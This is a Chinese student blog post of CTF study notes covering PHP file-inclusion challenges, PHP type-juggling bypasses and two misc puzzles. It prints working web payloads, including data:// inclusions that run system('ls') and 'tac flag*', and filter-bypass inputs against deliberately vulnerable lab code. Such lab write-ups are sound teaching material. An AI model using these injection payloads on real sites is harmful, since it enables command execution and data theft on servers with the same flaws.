第二周社团学习15题

最新推荐文章于 2024-04-05 10:46:03 发布
最新推荐文章于 2024-04-05 10:46:03 发布
阅读量55 收藏
点赞数
文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79710824/article/details/134625620
版权

文件包含:

一:if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

这题没什么特点,payload一个data伪协议或者php伪协议就绕过去了

二:

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

看到我php被三个?所以不能使用php伪协议,此时就使用data伪协议

payload:?file=data://text/plain,<?=system('ls');?>

可以得到一个flag文件

在payload:?file=data://text/plain,<?=system('tac flag*');?>

得到flag

有个知识点cat指令把flag.php的内容导出后依然遵循php的语法,那么没有echo语句,就无法显示,而tac指令将一切倒过来后:就不是php语句了,在html语句里就就会直接显示出来。

所以我认为一般都使用tac指令吧

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
} 可以看出和上一题相似,php和data关键字都被过滤了,想到可能还有大小写绕过

了解到有一个日志包含,但是模仿B站上还没做出来(苦笑)


<?php
highlight_file(__FILE__);
    include("./check.php");
    if(isset($_GET['filename'])){
        $filename  = $_GET['filename'];
        include($filename);
    }
?>
 使用php://filter 发现不行,猜测应该被过滤了,接着用read,encoud,base,都返回一个do not back,

上网了解到
php有两种过滤器string和iconv,但是string还是被过滤,那就使用bp抓包群集爆破,

得到的类型状态和长度只有两种,分清不开,那只能一个一个放到重放器里面去试得到flag

 if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

与第三题一样尝试使用日志包含但是还是没有做到(汗流浃背)

php特性

include("flag.php");
highlight_file(__FILE__);

if(isset($_GET['num'])){
    $num = $_GET['num'];
    if(preg_match("/[0-9]/", $num)){
        die("no no no!");
    }
    if(intval($num)){
        echo $flag;
    }
}

“preg_grep(正则表达式,数组,$flags)”;参数“$flags”

所以我们payload一个数组一到九范围的即可得到flag

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}相关的知识int intval( var,base)
//var指要转换成 integer 的数量值,base指转化所使用的进制 
Note: 
如果 base 是 0,通过检测 var 的格式来决定使用的进制: 
◦ 如果字符串包括了 "0x" (或 "0X") 的前缀,使用 16 进制 (hex);否则,  
◦ 如果字符串以 "0" 开始,使用 8 进制(octal);否则,  
◦ 将使用 10 进制 (decimal)。 

所以对4476采用8进制即可获得flag


show_source(__FILE__);
include('flag.php');
$a=$_GET['cmd'];
if(preg_match('/^php$/im', $a)){
    if(preg_match('/^php$/i', $a)){
        echo 'hacker';
    }
    else{
        echo $flag;
    }
}
else{
    echo 'nonononono';
}看到有与第一次两个正则表达式

知识:第一个使用了'/im',这意味着i(忽略大小写)和m(多行模式)。第二个只使用了'i',也就是忽略大小写。

所以我分析得到要符合第一个的if并且不符合第二个if语句

payload:?cmd=%0aphp(%0a)是换行,同时不满足第二匹配(固定字符串"php")

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(intval($num,0)==4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}
 

从上往下看此题只能符合ntval($num,0)==4476这一条

将4476八进制然后payload:?num=010574得到flag

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(!strpos($num, "0")){这里检查提交的数字第一个不能出现0
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}
而且里面三个等号,严格相等

知识点:strpos() f函数查找字符串在另一字符串中第一次出现的位置(区分大小写)。

所以我就payload:4476.0得到flag

十一

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]|\./i", $num)){这里忽略掉大小写,并且/还有.都过滤了
        die("no no no!!");
    }
    if(!strpos($num, "0")){
        die("no no no!!!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

它将尝试将一个字符串转换为一个整数。第二个参数 0 是可选的,它定义了要使用的基数。在您的例子中,基数被设置为 0,这意味着函数将尝试解析字符串,并返回一个十进制的整数。

所以我payload第一个为0再将4476八进制编码

想到+会被解释成空格。所以在前面放入+得到flag

用其他符号就不符合第三个if

payload:?num=+010574

十二

highlight_file(__FILE__);

if(isset($_GET['u'])){
    if($_GET['u']=='flag.php'){
        die("no no no");
    }else{
        highlight_file($_GET['u']);
    }


}
payload:u=flag.php1绕过第一个if

得到

提示不存在那么这个路径那么就将之前的1去掉加入路径得到payload:

十三:

include("flag.php");
highlight_file(__FILE__);
if (isset($_POST['a']) and isset($_POST['b'])) {
if ($_POST['a'] != $_POST['b'])
if (md5($_POST['a']) === md5($_POST['b']))
echo $flag;
else
print 'Wrong.';
}
?>

要a和b不相等,但在内层第三个if中又相等,所以想到一个知识点

知识:md5弱类型比较可以直接数组绕过,其结果都会转换为nul

payload:a[]=1&b[]=3

十四misc

尝试转为十六进制得到:0x3d3d3d3d513642475354334f4859464d37435a415450424f4454344348324d4e37434e36565a414f5a3358474859344b374b354144474e504553554355495a49

还没看出,转化为字符串试试用ascii编码得到====Q6BGST3OHYFM7CZATPBODT4CH2MN7CN6VZAOZ3XGHY4K7K5ADGNPESUCUIZI

再将他倒过来进行base64解码得到FQARD{L0u_W0s_yp3_4_k4qrcp_0d_apwnr0}

形式不对再使用凯撒解码得到flag

十五

下载得到一个二维码

打开链接再解密就得到flag

2301_79710824
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
PHP 原生类学习与利用
snowlyzz的博客
09-22 1386
php 原生类利用与学习
buuctf刷
qq_41788704的博客
10-28 1961
buuctf刷BJDCTF2020 Easy MD5网鼎杯 2020 青龙组 AreUSerialzGYCTF2020 Blacklist强网杯 2019 随便注 BJDCTF2020 Easy MD5 进来就是一个输入框,发包查看返回信息 可以看到SQL语句。这里猜想MD5出来的值会不会可以可以这样利用 select * from ‘admin’ where password=’‘or’1’ 这段PHP代码可以找到MD5出来的值类似于 '‘or’1…’ <?php for ($i = 0;;)
攻防世界-file_include
m0_49025459的博客
12-18 7214
对于我这种编码能力差的小白,我直接就是一个一个手测,然后呢,发现?filename=php://filter//convert.iconv.SJIS*.UCS-4*/resource=check.php好使,但是没有flag。读我们发现我们需要去读取./check.php中的数据,我们尝试用伪协议进行读取,接下来构造payload。文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。通过阅读php代码,我们明显的可以发现,这个一个文件包含的类型
CTF.show 文件包含
m0_64444909的博客
08-25 1878
ctf文件包含
file_include(攻防世界)
m0_56107268的博客
11-14 7277
php转化器的学习
攻防世界web篇(二)
weixin_51387754的博客
09-30 518
攻防世界是一群信息安全大咖共同研究的答、竞赛、以游戏方式结合的一款新型学习平台,融入多种场景在线型,集实战、理论、趣味于一体。让更多的安全爱好者参与挑战,从赛中学到知识,从玩法中找到乐趣的全新体验。本次正式上线推出轻量级高品质网络安全竞赛产品——自助办赛,建立了一套费用低、轻量级、可配置的网络安全竞赛解决方案,
Web安全攻防世界03 file_include(江苏工匠杯)
weixin_42789937的博客
11-27 1510
Web安全攻防世界03 file_include(江苏工匠杯),文件包含入门目,依旧参考大佬的WP有所补充,内容对小白友好~
fileinclude_file_include,2024年最新网络安全大厂面试来袭
最新发布
m0_61068496的博客
04-05 794
如果$lan不存在或为空,使用setcookie函数设置一个名为language的cookie,值为"english",并包含"english.php"文件。突然想要file\_get\_contents函数是打开文件读取的,所以我们这里需要利用php的data伪协议写入数据。发现可以读取,抓包后是没有Cookie字段的,记得插入Cookie的位置不要处于数据包最后,反正我会请求超时。使用file_get_contents函数获取名为index.php的文件的内容,并将其赋值给变量$x。
CTFshow刷日记-WEB-PHP特性(上篇89-115)
Love&Share
09-05 3497
Part1 有关 intval() 函数的绕过技巧 web89 clude("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 能被intval
ctfshow-php特性-超详解(干货)
qq_50589021的博客
08-05 6890
PHP特性 web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } ?> intval函数(获
ctfshow-php特性系列
qq_45951598的博客
04-10 1956
文章目录WEB89-数组绕过WEB90-intval绕过WEB91-preg_match-换行绕过WEB92-科学计数法EWEb93WEB94WEB95WEB96WEB97-MD5绕过WEB98 WEB89-数组绕过 源码: include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){
CTFshow web入门文件包含
qq_39948058的博客
10-04 2105
前言:看 web78: if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 发现include是文件包含没错了,伪协议读取出来就可以了 exp:?file=php://filter/convert.base64-encode/resource=flag.php web79: ...
shownews.php,ctfshow web入门 文件包含(持续更新)
weixin_34433661的博客
04-01 209
文章目录web78web79web80-81web82web78if(isset($_GET['file'])){$file = $_GET['file'];include($file);}else{highlight_file(__FILE__);}第一是最基础的文件包含,直接上payloadpayload:?file=php://filter/convert.base64-encode/re...
BUUCTF-WEB(1-16)
菜鸡程序员的博客
01-26 1785
BUUCTF-WEB(1-16) 1.[HCTF 2018]WarmUp ​ 根据点开靶机时的一个提示:代码审计,可知主要考察代码审计,在点开靶机之后,出现了一个滑稽表情,右键检查网页源码,发现在图片的上方有个注释 ,<!--source.php-->感觉像是个有用的信息,于是在网页的链接后边加上/source.php页面上出现了代码 <?php highlight_file(__FILE__); class emmm { public stati
ctfshow 文件包含
qq_74806534的博客
03-23 642
和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。
BUUCTF BUU LFI COURSE 1
m0_49025459的博客
04-10 1502
目 代码 <?php /** * Created by PhpStorm. * User: jinzhao * Date: 2019/7/9 * Time: 7:07 AM */ highlight_file(__FILE__); if(isset($_GET['file'])) { $str = $_GET['file']; include $_GET['file']; } 直接修改url http://3b1ee075-5de2-4de4-b1e.
攻防世界web-file_include(江苏工匠杯/泰山杯原)
yuanxu8877的博客
10-30 3911
攻防世界web-file_include(江苏工匠杯)
攻防世界目练习——Web难度1(二)
qq_48550824的博客
09-01 536
length:正数 - 从 start 参数所在的位置返回的长度,负数 - 从字符串末端返回的长度,如果 start 参数是负数且 length 小于或等于 start,则 length 为 0。因为本中字符串"DGGJ"是没有数字的字符串,因此,当我们的$c[“n”]=0的时候(或者null),会将前面要查找的字符串自动转化为0然后进行比较。“admin”==0 //admin被转换成数字,由于admin是字符串,转换失败,int(admin)=0,所以比较结果是true。
PHP-伪协议
摘星怪sec的blog
04-25 3969
常用的伪协议有就可以利用使用文件包含函数包含文件时,文件中的代码会被执行,如果想要读取文件源码,可以使用对文件内容进行编码,编码后的文件内容不会被执行,而是展示在页面中,我们将页面中的内容使用解码,就可以获取文件的源码了。
深度学习驱动的复杂网络社团检测:新视角与综述
"这篇论文是关于网络社团检测方法的综述,从统计建模到深度学习的应用。作者包括Di Jin, Zhizhi Yu, Pengfei Jiao, Shirui Pan, Dongxiao He, Jia Wu, Philip S. Yu和Weixiong Zhang。该文于2021年8月14日在arXiv上...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值